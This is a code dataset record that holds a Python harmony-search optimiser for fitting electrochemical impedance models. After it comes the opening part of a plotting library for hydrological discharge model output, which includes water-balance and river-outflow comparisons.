458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | null | null | null |
v0/aia_eis_v0/goa/human_based/harmony_search/hs_0.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | null | null | null |
import copy
import random
from time import perf_counter
import os
import sys
sys.path.append('../../../')
from utils.file_utils.filename_utils import get_ecm_num_str, get_Num_len
from data_processor.GOA_simulation.GOA_ECMs_simulation import load_sim_ecm_para_config_dict
from goa.GOA_criterions import goa_criterion_pack
from GA_pack.fittness_functions.eis_fitness import cal_EIS_WSE_fitness_1
class HS:
"""
Refer:
paper:
paper1- A New Heuristic Optimization Algorithm: Harmony Search
paper2- 和声搜索算法的搜索机制研究及其应用
chapter 2 和声搜索算法及其相关算法介绍
2.1 和声搜索算法
2.1.1 和声搜索算法的基本原理
表2-1 基本HS算法的步骤
Version
First
Adjustable parameters:
hmcr, Harmony Memory Changing Rate, (0 ~ 1)
par, Pitch Adjusting Rate, (0 ~ 1)
"""
class Harmony:
def __init__(self, limits_list, fitness_function):
self.limits_list = limits_list
self.fitness_function = fitness_function
self.x_list = [random.uniform(limit[0], limit[1]) for limit in limits_list]
self.fitness = fitness_function(self.x_list)
def update(self):
for i, x in enumerate(self.x_list):
if (x < self.limits_list[i][0]) or (x > self.limits_list[i][1]):
x = random.uniform(self.limits_list[i][0], self.limits_list[i][1])
self.x_list[i] = x
self.fitness = self.fitness_function(self.x_list)
def __init__(self, iter_num, harmony_num, limits_list, fitness_function, hmcr=0.5, par=0.1):
self.iter_num = iter_num
self.limits_list = limits_list
self.fitness_function = fitness_function
# Unique parameters of HS
# hms = Harmony memory size 记忆库大小 is equal to the number of all the harmony
self.harmony_num = harmony_num
# Harmony memory considering rate 记忆库选中概率
self.hmcr = hmcr
# Pitch adjusting rate 音调调节概率
self.par = par
self.harmony_list = [self.Harmony(limits_list, fitness_function) for i in range(harmony_num)]
self.global_best_harmony = self.Harmony(limits_list, fitness_function)
def search(self):
cur_best_harmony_list = []
global_best_harmony_list = []
for iter_index in range(self.iter_num):
sorted_harmony_list = sorted(self.harmony_list, key=lambda harmony: harmony.fitness, reverse=False)
cur_best_harmony = sorted_harmony_list[0]
if cur_best_harmony.fitness < self.global_best_harmony.fitness:
self.global_best_harmony = copy.deepcopy(cur_best_harmony)
cur_best_harmony_list.append(copy.deepcopy(cur_best_harmony))
global_best_harmony_list.append(copy.deepcopy(self.global_best_harmony))
for har_i in range(self.harmony_num):
x_list_pack = [copy.deepcopy(har.x_list) for har in sorted_harmony_list]
tmp_x_list = []
for dim_i in range(len(self.limits_list)):
if random.random() < self.hmcr:
# random.sample returns a list
x = random.sample([x_list[dim_i] for x_list in x_list_pack], 1)[0]
# Add a disturbance to x by probability PAR, I use a uniform distribution in stead of the discrete choices
if random.random() < self.par:
dim_range = self.limits_list[dim_i][1] - self.limits_list[dim_i][0]
x = random.uniform(x - dim_range * self.par / 2, x + dim_range * self.par / 2)
else:
x = random.uniform(self.limits_list[dim_i][0], self.limits_list[dim_i][1])
tmp_x_list.append(x)
tmp_harmony = self.Harmony(self.limits_list, self.fitness_function)
tmp_harmony.x_list = tmp_x_list
tmp_harmony.update()
# Compare with the worst harmony in the harmony_list
# tmp_sorted_harmony_list = sorted(self.harmony_list, key=lambda harmony: harmony.fitness, reverse=False)
# if tmp_harmony.fitness < tmp_sorted_harmony_list[-1].fitness:
# tmp_sorted_harmony_list[-1] = tmp_harmony
# self.harmony_list = copy.deepcopy(tmp_sorted_harmony_list)
if tmp_harmony.fitness < sorted_harmony_list[-1].fitness:
sorted_harmony_list[-1] = tmp_harmony
sorted_harmony_list.sort(key=lambda harmony: harmony.fitness, reverse=False)
self.harmony_list = copy.deepcopy(sorted_harmony_list)
return cur_best_harmony_list, global_best_harmony_list
# if __name__ == '__main__':
# iter_num = 1000
# harmony_num = 20
# dim = 7
#
# f1_limits_list = [[-100, 100] for i in range(dim)]
# from GA_pack.fittness_functions.f1 import f1
#
# f1_fitness_function = f1
# hs = HS(iter_num, harmony_num, f1_limits_list, f1_fitness_function)
# cur_best_harmony_list, global_best_harmony_list = hs.search()
# print('Best entity position:', hs.global_best_harmony.x_list)
# print('Fitness:', hs.global_best_harmony.fitness)
#
# # Draw the best entity in each iteration.
# iter_list = [i for i in range(iter_num)]
# cur_fitness_list = [entity.fitness for entity in cur_best_harmony_list]
# cur_global_fitness_list = [entity.fitness for entity in global_best_harmony_list]
#
# import matplotlib.pyplot as plt
# fig, ax = plt.subplots()
# line1, = ax.plot(iter_list, cur_fitness_list, label='Current Iteration {0}\nentity number {1}\nDimension {2}'.format(iter_num, harmony_num, dim))
# line1.set_dashes([5, 5, 10, 5]) # 2pt line, 2pt break, 10pt line, 2pt break
# line2, = ax.plot(iter_list, cur_global_fitness_list, label='Current Global Iteration {0}\nentity number {1}\nDimension {2}'.format(iter_num, harmony_num, dim))
# line2.set_dashes([2, 2, 10, 2]) # 2pt line, 2pt break, 10pt line, 2pt break
# ax.legend()
# plt.xlabel('Iteration times')
# plt.ylabel('Error rate')
# plt.title('Search the minimum of f1 = sum(Xi ^ 2)')
# plt.show()
class HS_EIS:
"""
Refer:
paper:
paper1- A New Heuristic Optimization Algorithm: Harmony Search
paper2- 和声搜索算法的搜索机制研究及其应用
chapter 2 和声搜索算法及其相关算法介绍
2.1 和声搜索算法
2.1.1 和声搜索算法的基本原理
表2-1 基本HS算法的步骤
Version
First
Adjustable parameters:
hmcr, Harmony Memory Changing Rate, (0 ~ 1)
par, Pitch Adjusting Rate, (0 ~ 1)
"""
class Harmony:
def __init__(self, exp_data_dict, fitness_function):
self.exp_data_dict = exp_data_dict
self.limits_list = exp_data_dict['limit']
self.fitness_function = fitness_function
self.x_list = [random.uniform(limit[0], limit[1]) for limit in self.limits_list]
self.fitness = fitness_function(self.exp_data_dict, self.x_list)
def update(self):
for i, x in enumerate(self.x_list):
if (x < self.limits_list[i][0]) or (x > self.limits_list[i][1]):
x = random.uniform(self.limits_list[i][0], self.limits_list[i][1])
self.x_list[i] = x
self.fitness = self.fitness_function(self.exp_data_dict, self.x_list)
def __init__(self, exp_data_dict, iter_num, harmony_num, hmcr=0.5, par=0.1, fitness_function=cal_EIS_WSE_fitness_1):
self.exp_data_dict = exp_data_dict
self.limits_list = exp_data_dict['limit']
self.iter_num = iter_num
self.fitness_function = fitness_function
# Unique parameters of HS
# hms = Harmony memory size 记忆库大小 is equal to the number of all the harmony
self.harmony_num = harmony_num
# Harmony memory considering rate 记忆库选中概率
self.hmcr = hmcr
# Pitch adjusting rate 音调调节概率
self.par = par
self.harmony_list = [self.Harmony(self.exp_data_dict, fitness_function) for i in range(harmony_num)]
self.global_best_harmony = self.Harmony(self.exp_data_dict, fitness_function)
def search(self):
cur_best_harmony_list = []
global_best_harmony_list = []
continue_criterion = True
iter = 0
while continue_criterion:
sorted_harmony_list = sorted(self.harmony_list, key=lambda harmony: harmony.fitness, reverse=False)
cur_best_harmony = sorted_harmony_list[0]
if cur_best_harmony.fitness < self.global_best_harmony.fitness:
self.global_best_harmony = copy.deepcopy(cur_best_harmony)
cur_best_harmony_list.append(copy.deepcopy(cur_best_harmony))
global_best_harmony_list.append(copy.deepcopy(self.global_best_harmony))
for har_i in range(self.harmony_num):
x_list_pack = [copy.deepcopy(har.x_list) for har in sorted_harmony_list]
tmp_x_list = []
for dim_i in range(len(self.limits_list)):
if random.random() < self.hmcr:
# random.sample returns a list
x = random.sample([x_list[dim_i] for x_list in x_list_pack], 1)[0]
# Add a disturbance to x by probability PAR, I use a uniform distribution in stead of the discrete choices
if random.random() < self.par:
dim_range = self.limits_list[dim_i][1] - self.limits_list[dim_i][0]
x = random.uniform(x - dim_range * self.par / 2, x + dim_range * self.par / 2)
else:
x = random.uniform(self.limits_list[dim_i][0], self.limits_list[dim_i][1])
tmp_x_list.append(x)
tmp_harmony = self.Harmony(self.exp_data_dict, self.fitness_function)
tmp_harmony.x_list = tmp_x_list
tmp_harmony.update()
if tmp_harmony.fitness < sorted_harmony_list[-1].fitness:
sorted_harmony_list[-1] = tmp_harmony
sorted_harmony_list.sort(key=lambda harmony: harmony.fitness, reverse=False)
self.harmony_list = copy.deepcopy(sorted_harmony_list)
# There are two entities only after at least two iteration
# If there is global_best_entity_list, use it,
# If not, use current_best_entity_list to replace
if iter >= 1:
x_lists_list = [global_best_harmony_list[-2].x_list, global_best_harmony_list[-1].x_list]
goa_criterion, chi_squared = goa_criterion_pack(x_lists_list=x_lists_list, iter=iter,
max_iter_time=self.iter_num,
data_dict=self.exp_data_dict)
if goa_criterion:
continue_criterion = False
iter += 1
return cur_best_harmony_list, global_best_harmony_list, iter, chi_squared
class HS_EIS_access:
"""
Refer:
paper:
paper1- A New Heuristic Optimization Algorithm: Harmony Search
paper2- 和声搜索算法的搜索机制研究及其应用
chapter 2 和声搜索算法及其相关算法介绍
2.1 和声搜索算法
2.1.1 和声搜索算法的基本原理
表2-1 基本HS算法的步骤
Version
First
Adjustable parameters:
hmcr, Harmony Memory Changing Rate, (0 ~ 1)
par, Pitch Adjusting Rate, (0 ~ 1)
"""
class Harmony:
def __init__(self, exp_data_dict, fitness_function):
self.exp_data_dict = exp_data_dict
self.limits_list = exp_data_dict['limit']
self.fitness_function = fitness_function
self.x_list = [random.uniform(limit[0], limit[1]) for limit in self.limits_list]
self.fitness = fitness_function(self.exp_data_dict, self.x_list)
def update(self):
for i, x in enumerate(self.x_list):
if (x < self.limits_list[i][0]) or (x > self.limits_list[i][1]):
x = random.uniform(self.limits_list[i][0], self.limits_list[i][1])
self.x_list[i] = x
self.fitness = self.fitness_function(self.exp_data_dict, self.x_list)
def __init__(self, exp_data_dict, iter_num, harmony_num, hmcr=0.5, par=0.1, fitness_function=cal_EIS_WSE_fitness_1):
self.exp_data_dict = exp_data_dict
self.limits_list = exp_data_dict['limit']
self.iter_num = iter_num
self.fitness_function = fitness_function
# Unique parameters of HS
# hms = Harmony memory size 记忆库大小 is equal to the number of all the harmony
self.harmony_num = harmony_num
# Harmony memory considering rate 记忆库选中概率
self.hmcr = hmcr
# Pitch adjusting rate 音调调节概率
self.par = par
self.harmony_list = [self.Harmony(self.exp_data_dict, fitness_function) for i in range(harmony_num)]
self.global_best_harmony = self.Harmony(self.exp_data_dict, fitness_function)
def search(self, res_fn, start_time):
cur_best_harmony_list = []
global_best_harmony_list = []
continue_criterion = True
iter = 0
while continue_criterion:
sorted_harmony_list = sorted(self.harmony_list, key=lambda harmony: harmony.fitness, reverse=False)
cur_best_harmony = sorted_harmony_list[0]
if cur_best_harmony.fitness < self.global_best_harmony.fitness:
self.global_best_harmony = copy.deepcopy(cur_best_harmony)
cur_best_harmony_list.append(copy.deepcopy(cur_best_harmony))
global_best_harmony_list.append(copy.deepcopy(self.global_best_harmony))
for har_i in range(self.harmony_num):
x_list_pack = [copy.deepcopy(har.x_list) for har in sorted_harmony_list]
tmp_x_list = []
for dim_i in range(len(self.limits_list)):
if random.random() < self.hmcr:
# random.sample returns a list
x = random.sample([x_list[dim_i] for x_list in x_list_pack], 1)[0]
# Add a disturbance to x by probability PAR, I use a uniform distribution in stead of the discrete choices
if random.random() < self.par:
dim_range = self.limits_list[dim_i][1] - self.limits_list[dim_i][0]
x = random.uniform(x - dim_range * self.par / 2, x + dim_range * self.par / 2)
else:
x = random.uniform(self.limits_list[dim_i][0], self.limits_list[dim_i][1])
tmp_x_list.append(x)
tmp_harmony = self.Harmony(self.exp_data_dict, self.fitness_function)
tmp_harmony.x_list = tmp_x_list
tmp_harmony.update()
if tmp_harmony.fitness < sorted_harmony_list[-1].fitness:
sorted_harmony_list[-1] = tmp_harmony
sorted_harmony_list.sort(key=lambda harmony: harmony.fitness, reverse=False)
self.harmony_list = copy.deepcopy(sorted_harmony_list)
# There are two entities only after at least two iteration
# If there is global_best_entity_list, use it,
# If not, use current_best_entity_list to replace
if iter >= 1:
x_lists_list = [global_best_harmony_list[-2].x_list, global_best_harmony_list[-1].x_list]
goa_criterion, chi_squared = goa_criterion_pack(x_lists_list=x_lists_list, \
iter=iter, \
max_iter_time=self.iter_num, \
data_dict=self.exp_data_dict, \
CS_limit=1e-70)
# Write R(RC)_IS_lin-kk_res.txt into a txt file
# R(RC)_IS_lin-kk_res.txt = iter_time + fitted_para_list + Chi-Squared + Code running time
with open(res_fn, 'a+') as file:
line = str(iter) + ',[' \
+ ','.join([str(para) for para in global_best_harmony_list[-1].x_list]) + '],' \
+ str(chi_squared) + ',' + str(perf_counter() - start_time) + '\n'
file.write(line)
if goa_criterion:
continue_criterion = False
iter += 1
def access_HS_EIS():
counter = 0
# Iterate on 9 ECMs
for i in range(1, 10):
ecm_sim_folder = '../../../datasets/goa_datasets/simulated'
ecm_num = i
ecm_num_str = get_ecm_num_str(ecm_num)
file_path = os.path.join(ecm_sim_folder, 'ecm_' + ecm_num_str)
sim_ecm = load_sim_ecm_para_config_dict(ecm_num, file_path)
para_num = len(sim_ecm['para'])
# Iterate for 100 times
for j in range(100):
t_start = perf_counter()
# ------------------------------ Change GOA name ------------------------------
goa = HS_EIS_access(exp_data_dict=sim_ecm, iter_num=10000, harmony_num=10*para_num)
res_fn = 'hs_ecm{0}_'.format(i) + get_Num_len(num=j, length=2) + '.txt'
# ------------------------------ Change GOA name ------------------------------
goa.search(res_fn, start_time=t_start)
counter += 1
print('HS left: {0}'.format(900 - counter))
# access_HS_EIS()
| 47.991892
| 165
| 0.599088
| 2,308
| 17,757
| 4.315425
| 0.100953
| 0.068474
| 0.052008
| 0.03012
| 0.833936
| 0.814357
| 0.796386
| 0.779819
| 0.761446
| 0.75241
| 0
| 0.01636
| 0.308104
| 17,757
| 370
| 166
| 47.991892
| 0.794319
| 0.251112
| 0
| 0.745283
| 0
| 0
| 0.008665
| 0.003067
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061321
| false
| 0
| 0.042453
| 0
| 0.141509
| 0.004717
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5c93131ceab7de9702335f285f992a7c461103e6
| 305,160
|
py
|
Python
|
Dynamic_HD_Scripts/HD_Plots/plots/plots_library.py
|
ThomasRiddick/DynamicHD
|
bff378a49ff6c709dc59c2d6835852e1083df20a
|
[
"BSD-3-Clause"
] | 1
|
2021-08-04T07:51:18.000Z
|
2021-08-04T07:51:18.000Z
|
Dynamic_HD_Scripts/HD_Plots/plots/plots_library.py
|
ThomasRiddick/DynamicHD
|
bff378a49ff6c709dc59c2d6835852e1083df20a
|
[
"BSD-3-Clause"
] | 1
|
2022-01-27T22:12:45.000Z
|
2022-02-01T10:16:47.000Z
|
Dynamic_HD_Scripts/HD_Plots/plots/plots_library.py
|
ThomasRiddick/DynamicHD
|
bff378a49ff6c709dc59c2d6835852e1083df20a
|
[
"BSD-3-Clause"
] | null | null | null |
'''
A module containing a library of methods and classes to generate plots
needed for dynamic HD work. Which plots are created is controlled in
the main function.
Created on Jan 29, 2016
@author: thomasriddick
'''
import matplotlib.pyplot as plt
import matplotlib as mpl
from matplotlib import gridspec
import matplotlib.animation as animation
import matplotlib.gridspec as gridspec
import numpy as np
import datetime
import textwrap
import os.path
import math
import copy
from netCDF4 import Dataset
from Dynamic_HD_Scripts.base import iodriver
from Dynamic_HD_Scripts.base import iohelper as iohlpr
from Dynamic_HD_Scripts.base import field
from Dynamic_HD_Scripts.base import grid
from Dynamic_HD_Scripts.utilities import utilities
from HD_Plots.utilities import plotting_tools as pts
from HD_Plots.utilities import match_river_mouths as mtch_rm
from HD_Plots.utilities import river_comparison_plotting_routines as rc_pts
from HD_Plots.utilities import flowmap_plotting_routines as fmp_pts #@UnresolvedImport
from HD_Plots.utilities.interactive_plotting_routines import Interactive_Plots
from HD_Plots.utilities.color_palette import ColorPalette #@UnresolvedImport
global interactive_plots
class Plots(object):
"""A general base class for plots"""
hd_data_path = '/Users/thomasriddick/Documents/data/HDdata/'
scratch_dir = '/Users/thomasriddick/Documents/data/temp/'
def __init__(self,save=False,color_palette_to_use='default'):
"""Class constructor."""
self.colors = ColorPalette(color_palette_to_use)
self.save = save
class HDparameterPlots(Plots):
hdfile_extension = "hdfiles"
def __init__(self,save=False,color_palette_to_use='default'):
super(HDparameterPlots,self).__init__(save,color_palette_to_use)
self.hdfile_path = os.path.join(self.hd_data_path,self.hdfile_extension)
def flow_parameter_distribution_for_non_lake_cells_for_current_HD_model(self):
"""Calculate the distribution of flow parameter values for the current HD model in non lake cells"""
current_HD_model_hd_file = os.path.join(self.hdfile_path,"hdpara_file_from_current_model.nc")
self._flow_parameter_distribution_helper(current_HD_model_hd_file)
def flow_parameter_distribution_current_HD_model_for_current_HD_model_reprocessed_without_lakes_and_wetlands(self):
"""Calculate the distribution of flow parameter values for the current model reprocessed without lakes/wetlands"""
reprocessed_current_HD_model_hd_file = os.path.join(self.hdfile_path,"generated",
"hd_file_regenerate_hd_file_without_lakes_"
"and_wetlands_20170113_173241.nc")
self._flow_parameter_distribution_helper(reprocessed_current_HD_model_hd_file)
def flow_parameter_distribution_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs(self):
"""Calculate the distribution of flow parameter values for the current model reprocessed without lakes/wetlands"""
hd_file = os.path.join(self.hdfile_path,"generated",
"hd_file_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_"
"sinks_oceans_lsmask_plus_upscale_rdirs_20170123_165707.nc")
self._flow_parameter_distribution_helper(hd_file)
def flow_parameter_distribution_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_no_tuning(self):
"""Calculate the distribution of flow parameter values for the current model reprocessed without lakes/wetlands"""
hd_file = os.path.join(self.hdfile_path,"generated",
"hd_file_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_"
"oceans_lsmask_plus_upscale_rdirs_20170112_161226.nc")
self._flow_parameter_distribution_helper(hd_file)
def _flow_parameter_distribution_helper(self,hd_file):
river_flow_k_param = iodriver.load_field(filename=hd_file,
file_type=iodriver.\
get_file_extension(hd_file),
field_type="Generic", unmask=False,
fieldname="ARF_K", grid_type="HD")
river_flow_n_param = iodriver.load_field(filename=hd_file,
file_type=iodriver.\
get_file_extension(hd_file),
field_type="Generic", unmask=False,
fieldname="ARF_N", grid_type="HD")
river_flow_k_param.mask_field_with_external_mask(river_flow_n_param.get_data() < 5)
values = river_flow_k_param.get_data()[np.ma.nonzero(river_flow_k_param.get_data())]
fig = plt.figure()
ax = fig.add_subplot(111)
num_bins = 150
ax.hist(values,num_bins,range=(0.0,1.5))
ax.set_ylim(0.1,100000)
plt.yscale('log', nonposy='clip')
class HDOutputPlots(Plots):
"""A class for plotting HD offline (or online?) model output"""
rdirs_path_extension = 'rdirs'
jsbach_restart_file_path_extension = 'jsbachrestartfiles'
def __init__(self,save=False,color_palette_to_use='default'):
"""Class constructor."""
super(HDOutputPlots,self).__init__(save,color_palette_to_use)
self.rdirs_data_directory = os.path.join(self.hd_data_path,self.rdirs_path_extension)
self.upscaled_rdirs_data_directory = os.path.join(self.rdirs_data_directory,
'generated','upscaled')
self.jsbach_restart_file_directory = os.path.join(self.hd_data_path,
self.jsbach_restart_file_path_extension)
self.generated_jsbach_restart_file_directory = os.path.join(self.jsbach_restart_file_directory,
'generated')
self.hdinput_data_directory = os.path.join(self.hd_data_path,'hdinputdata')
self.cell_areas_data_directory = os.path.join(self.hd_data_path,'gridareasandspacings')
self.river_discharge_output_data_path = '/Users/thomasriddick/Documents/data/HDoutput'
def check_water_balance_of_1978_for_constant_forcing_of_0_01(self):
lsmask = iodriver.load_field("/Users/thomasriddick/Documents/data/HDdata/lsmasks/generated/"
"ls_mask_ten_minute_data_from_virna_0k_ALG4_sinkless"
"_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170123_165707_HD_transf.nc",
".nc",field_type='Generic',grid_type='HD')
cell_areas = iodriver.load_field("/Users/thomasriddick/Documents/data/HDdata/"
"gridareasandspacings/hdcellareas.nc",".nc",
field_type='Generic',fieldname="cell_area",grid_type='HD')
#stage summation to reduce rounding errors
five_day_discharges = []
for j in range(73):
for i in range(j*5,(j+1)*5):
discharge = iodriver.load_field("/Users/thomasriddick/Documents/data/HDoutput/hd_N01_1978-01-02_hd_"
"discharge_05__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_"
"sinks_oceans_lsmask_plus_upscale_rdirs_20170123_165707.nc",
".nc",field_type='Generic',fieldname="disch",timeslice=i,grid_type='HD')
discharge_times_area = discharge.get_data()*cell_areas.get_data()
if i == j*5:
five_day_discharges.append(np.sum(discharge_times_area,dtype=np.float128))
else:
five_day_discharges[-1] += np.sum(discharge_times_area,dtype=np.float128)
total_discharge = np.sum(five_day_discharges,dtype=np.float128)
lsmask_times_area = lsmask.get_data()*cell_areas.get_data()
change_in_water = self._calculate_total_water_in_restart("/Users/thomasriddick/Documents/data/temp/hdrestart_1978.nc") -\
self._calculate_total_water_in_restart("/Users/thomasriddick/Documents/data/temp/hdrestart_1977.nc")
days_in_year = 365.0
inflow_per_meter_squared = 0.02
print("Total water entering HD model: {0}".format(np.sum(lsmask_times_area,dtype=np.float128)*days_in_year*inflow_per_meter_squared))
print("Total discharge into oceans: {0}".format(total_discharge))
print("Total change in water in reservoirs: {0}".format(change_in_water))
print("Total discharge - total inflow: {0}: ".format((total_discharge - days_in_year*\
np.sum(lsmask_times_area,dtype=np.float128)*inflow_per_meter_squared)))
print("(Total discharge - total inflow) + change in reservoirs: {0}".format((total_discharge - days_in_year*np.sum(lsmask_times_area,dtype=np.float128)*inflow_per_meter_squared)+ change_in_water))
print("(Total discharge - total inflow) + change in reservoirs/Change in Reservoirs: {0}".format(((total_discharge - days_in_year*np.sum(lsmask_times_area,dtype=np.float128)*inflow_per_meter_squared)+ change_in_water)/change_in_water))
def _calculate_total_water_in_restart(self,restart_filename):
total_water = 0.0
fgmem_field = iodriver.load_field(restart_filename,
file_type=iodriver.get_file_extension(restart_filename),
field_type="Generic",
unmask=False,
timeslice=None,
fieldname="FGMEM",
grid_type="HD")
total_water += np.sum(fgmem_field.get_data(),dtype=np.float128)
finfl_field = iodriver.load_field(restart_filename,
file_type=iodriver.get_file_extension(restart_filename),
field_type="Generic",
unmask=False,
timeslice=None,
fieldname="FINFL",
grid_type="HD")
total_water += np.sum(finfl_field.get_data(),dtype=np.float128)
flfmem_field = iodriver.load_field(restart_filename,
file_type=iodriver.get_file_extension(restart_filename),
field_type="Generic",
unmask=False,
timeslice=None,
fieldname="FLFMEM",
grid_type="HD")
total_water += np.sum(flfmem_field.get_data(),dtype=np.float128)
frfmem_fields = []
for i in range(5):
frfmem_fields.append(iodriver.load_field(restart_filename,
file_type=iodriver.get_file_extension(restart_filename),
field_type="Generic",
unmask=False,
timeslice=None,
fieldname="FRFMEM{0}".format(i+1),
grid_type="HD"))
total_water += np.sum(frfmem_fields[-1].get_data(),dtype=np.float128)
return total_water
def _calculate_discharge_lost_to_changes_in_lsmask(self,lsmask_source_ref_filepath,lsmask_source_data_filepath,
run_off_filepath,discharge_filepath,
cell_areas_filepath,num_timeslices,grid_type="HD"):
if grid_type == "HD":
rdirs_ref = iodriver.load_field(lsmask_source_ref_filepath,iodriver.get_file_extension(lsmask_source_ref_filepath),
field_type='RiverDirections', unmask=True, grid_type='HD').get_data()
lsmask_ref = (rdirs_ref <= 0).astype(np.int32)
rdirs_data = iodriver.load_field(lsmask_source_data_filepath,iodriver.get_file_extension(lsmask_source_data_filepath),
field_type='RiverDirections', unmask=True, grid_type='HD').get_data()
lsmask_data = (rdirs_data <= 0).astype(np.int32)
else:
lsmask_ref = iodriver.load_field(lsmask_source_ref_filepath,iodriver.get_file_extension(lsmask_source_ref_filepath),
field_type='RiverDirections', unmask=True, fieldname='slm',grid_type=grid_type).get_data()
lsmask_data = iodriver.load_field(lsmask_source_data_filepath,iodriver.get_file_extension(lsmask_source_data_filepath),
field_type='RiverDirections', unmask=True, fieldname='slm',grid_type=grid_type).get_data()
cell_areas = iodriver.load_field(cell_areas_filepath,iodriver.get_file_extension(cell_areas_filepath),
field_type='Generic',unmask=True, fieldname='cell_area',grid_type=grid_type).get_data()
lost_discharge = []
for timeslice in range(num_timeslices):
run_off_field = iodriver.load_field(run_off_filepath, iodriver.get_file_extension(run_off_filepath),
field_type='Generic', unmask=True, timeslice=timeslice ,fieldname="var501", grid_type=grid_type).get_data()*\
cell_areas
discharge_field = iodriver.load_field(discharge_filepath,iodriver.get_file_extension(discharge_filepath),
field_type='Generic', unmask=True, timeslice=timeslice, fieldname="var502", grid_type=grid_type).get_data()*\
cell_areas
mask_difference = lsmask_ref - lsmask_data
run_off_field = run_off_field*mask_difference
discharge_field = discharge_field*mask_difference
lost_discharge.append(np.sum(run_off_field,dtype=np.float128) + np.sum(discharge_field,dtype=np.float128))
return lost_discharge
def _river_discharge_outflow_comparison_helper(self,ax,river_discharge_output_filepath,
rdirs_filepath,num_timeslices,lost_discharge=None,
label=None):
rdirs = iodriver.load_field(rdirs_filepath,
file_type=\
iodriver.get_file_extension(rdirs_filepath),
field_type='RiverDirections',
unmask=True,
grid_type='HD')
daily_global_river_discharge_outflow = np.zeros((num_timeslices))
for i in range(num_timeslices):
river_discharge = iodriver.load_field(river_discharge_output_filepath,
file_type=\
iodriver.get_file_extension(river_discharge_output_filepath),
field_type='RiverDischarge',
unmask=True,
timeslice=i,
fieldname='friv',
grid_type='HD')
river_discharge.set_non_outflow_points_to_zero(rdirs)
daily_global_river_discharge_outflow[i] =river_discharge.sum_river_outflow()
if lost_discharge is not None:
daily_global_river_discharge_outflow += lost_discharge
total_discharge_info = "Total discharge over year for {0}: {1} \n".format(label,np.sum(daily_global_river_discharge_outflow))
days = np.linspace(1,365,365)
ax.plot(days,daily_global_river_discharge_outflow,label=label)
return total_discharge_info
def plot_comparison_using_1990_rainfall_data(self):
ax = plt.subplots(1, 1, figsize=(12, 9))[1]
plt.ylim(0,7000000)
plt.xlim(1,365)
plt.xlabel("Time/days")
plt.ylabel("Discharge Rate/m^3/s")
total_discharge_info=""
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934.nc"),
rdirs_filepath=\
os.path.join(self.upscaled_rdirs_data_directory,
"upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_upscaled_updated_transf.nc"),
num_timeslices=365,label="Dynamic Model")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output_from_current_model.nc"),
rdirs_filepath=\
os.path.join(self.rdirs_data_directory,
"rdirs_from_current_hdparas.nc"),
num_timeslices=365,label="Current JSBACH Model")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output_from_current_model_after_100_cycles.nc"),
rdirs_filepath=\
os.path.join(self.rdirs_data_directory,
"rdirs_from_current_hdparas.nc"),
num_timeslices=365,label="Current Model HD Run using 100 cycle spin-up ")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_after_one_years_running.nc"),
rdirs_filepath=\
os.path.join(self.upscaled_rdirs_data_directory,
"upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_upscaled_updated_transf.nc"),
num_timeslices=365,label="Dynamic HD using 1 cycle spin-up")
total_discharge_info += self._river_discharge_outflow_comparison_helper(ax,river_discharge_output_filepath=\
os.path.join(self.river_discharge_output_data_path,
"hd_1990-01-2_hd_higres_output__ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170116_235534.nc"),
rdirs_filepath=\
os.path.join(self.upscaled_rdirs_data_directory,
"upscaled_rdirs_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170113_135934_upscaled_updated_transf.nc"),
num_timeslices=365,label="Dynamic HD using 1 cycle spin-up as basis")
days = np.linspace(1,365,365)
lost_discharge = self._calculate_discharge_lost_to_changes_in_lsmask(lsmask_source_ref_filepath=\
os.path.join(self.jsbach_restart_file_directory,
"jsbach_T106_11tiles_5layers_1976.nc"),
lsmask_source_data_filepath=\
os.path.join(self.generated_jsbach_restart_file_directory,
"updated_jsbach_T106_11tiles_5layers_1976_ten_minute_data_from_virna_0k_ALG4_sinkless_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170123_165707.nc"),
run_off_filepath=os.path.join(self.hdinput_data_directory,'runoff_T106_1990.nc'),
discharge_filepath=os.path.join(self.hdinput_data_directory,'drainage_T106_1990.nc'),
cell_areas_filepath=os.path.join(self.cell_areas_data_directory,'T106_grid_cell_areas.nc'),
num_timeslices=365,grid_type="T106")
ax.plot(days,lost_discharge,label="Lost discharge")
ax.legend()
